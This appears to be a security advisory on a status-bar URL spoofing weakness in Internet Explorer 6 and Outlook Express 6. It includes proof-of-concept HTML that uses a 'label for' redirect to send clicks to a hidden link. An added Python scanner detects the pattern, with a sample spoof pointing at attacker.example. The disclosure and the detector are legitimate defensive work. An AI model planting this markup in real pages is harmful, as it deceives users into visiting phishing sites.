bitlance winter has discovered a weakness in Internet Explorer/Outlook Express, which can be exploited by malicious people to trick users into visiting a malicious web site by obfuscating URLs.
By default, script code is allowed to manipulate the information displayed in the
status bar. However, an error allows the status bar to be manipulated without using
any script code at all, so the spoof also works where scripting is disabled (e.g. in
the "Restricted sites" zone).
This can be exploited by wrapping the visible link text in a "label" tag whose "for"
attribute references a different link: hovering over the text shows the URL of the
enclosing link in the status bar, while clicking the text activates the referenced
link and navigates to its URL instead.
This weakness is a variant of:
http://www.securityteam.us/article.php/20041029161335842
Example:
Code:
  <!-- hidden link that actually receives the click -->
  <p><a id="SPOOF" href=""></a></p>
  <div>
    <!-- visible link; its href is what the status bar displays on hover -->
    <a href="">
      <table>
        <caption>
          <a href="">
            <!-- the label redirects the click to the element with id="SPOOF" -->
            <label for="SPOOF">
              <u style="cursor: pointer; color: blue"> </u>
            </label>
          </a>
        </caption>
      </table>
    </a>
  </div>
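The pattern above can be checked for mechanically. The following scanner is an added example, not code from the original advisory or from Secunia: it parses an HTML document, tracks which links are open, and reports every "label" whose "for" attribute points at an anchor that is not one of the links enclosing it, i.e. exactly the case where the status bar shows one href and the click follows another. The sample documents and their URLs (attacker.example, bank.example) are constructed for the demonstration.

```python
"""Flag the <label for=...> status-bar spoofing pattern in an HTML document.

Added example, not part of the original advisory. Hovering the visible text
shows the href of the enclosing <a> in the status bar, but clicking a
<label for="X"> activates the element with id X, so the click follows a
different anchor. The scanner reports every <label for> nested inside a link
whose "for" target is an <a> that is not one of the enclosing links.
"""
from html.parser import HTMLParser


class LabelSpoofScanner(HTMLParser):
    """Single-pass scanner; call feed(), then findings()."""

    def __init__(self):
        super().__init__()
        self._seq = 0        # running number so each <a> is identifiable even with equal hrefs
        self._open = []      # stack of (seq, href) for currently open <a> elements
        self._anchors = {}   # id -> (seq, href) for every <a> that carries an id
        self._labels = []    # (for_id, innermost enclosing href, set of enclosing seqs)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._seq += 1
            href = a.get("href") or ""
            if a.get("id"):
                self._anchors[a["id"]] = (self._seq, href)
            self._open.append((self._seq, href))
        elif tag == "label" and a.get("for") and self._open:
            shown = self._open[-1][1]
            self._labels.append((a["for"], shown, {s for s, _ in self._open}))

    def handle_endtag(self, tag):
        if tag == "a" and self._open:
            self._open.pop()

    def findings(self):
        """Labels inside a link whose click target is a different anchor."""
        out = []
        for for_id, shown, enclosing in self._labels:
            hit = self._anchors.get(for_id)
            if hit and hit[0] not in enclosing:
                out.append({"label_for": for_id, "shown_href": shown, "click_href": hit[1]})
        return out


def scan(html):
    """Return the list of spoof findings for one HTML document."""
    p = LabelSpoofScanner()
    p.feed(html)
    p.close()
    return p.findings()


# Constructed sample: the advisory's structure with hypothetical URLs filled in.
SPOOF_SAMPLE = """
<p><a id="SPOOF" href="http://attacker.example/"></a></p>
<div><a href="http://bank.example/">
<table><caption><a href="http://bank.example/">
<label for="SPOOF"><u style="cursor: pointer; color: blue">http://bank.example/</u></label>
</a></caption></table>
</a></div>
"""

# Constructed benign sample: the label targets the very link it sits in.
BENIGN_SAMPLE = """
<a id="ok" href="http://bank.example/"><label for="ok">http://bank.example/</label></a>
"""

if __name__ == "__main__":
    for f in scan(SPOOF_SAMPLE):
        print(f"status bar shows {f['shown_href']!r} but click follows "
              f"{f['click_href']!r} (label for={f['label_for']!r})")
    print("benign:", scan(BENIGN_SAMPLE))
```

Because the check compares element identity rather than href strings, it still fires when both hrefs are empty or identical-looking, which is what matters when scanning captured mail or pages where the attacker controls both values. Nested anchors are invalid HTML, so a browser's own DOM may differ from this tokenizer's view; the scanner deliberately works on the raw tag stream for that reason.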
The weakness has been confirmed in Internet Explorer 6.0 on a fully patched system running Windows XP with SP2 installed. Other versions may also be affected.
SOFTWARE:
Microsoft Outlook Express 6
Microsoft Internet Explorer 6
SOLUTION:
Never follow links from untrusted sources; the URL shown in the status bar cannot be relied on to reflect the link's real destination.
PROVIDED AND/OR DISCOVERED BY:
bitlance winter
VERIFY ADVISORY:
http://secunia.com/advisories/14304/
Secunia Security Advisories
http://community.securityteam.us/article.php/20050217095815913